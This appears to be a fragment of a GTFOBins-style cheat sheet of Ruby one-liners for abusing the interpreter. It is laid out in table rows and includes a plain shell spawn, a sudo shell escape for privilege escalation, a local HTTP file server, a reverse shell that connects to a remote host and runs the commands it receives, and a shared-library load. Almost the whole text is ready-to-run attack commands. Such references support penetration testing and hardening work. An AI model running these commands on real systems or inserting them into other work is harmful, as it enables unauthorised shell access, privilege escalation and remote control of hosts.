| code |
| ruby -e 'exec "/bin/sh"' |
|
|
| code |
| sudo ruby -e 'exec "/bin/sh"' |
|
|
| description |
code |
| Serve files in the local folder running an HTTP server. |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
|
|
|
| description |
code |
| Run `nc -l -p 8000` to receive the shell on the other end. |
export RHOST=10.0.0.1
export RPORT=8000
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
|
|
| code |
| ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' |
|
|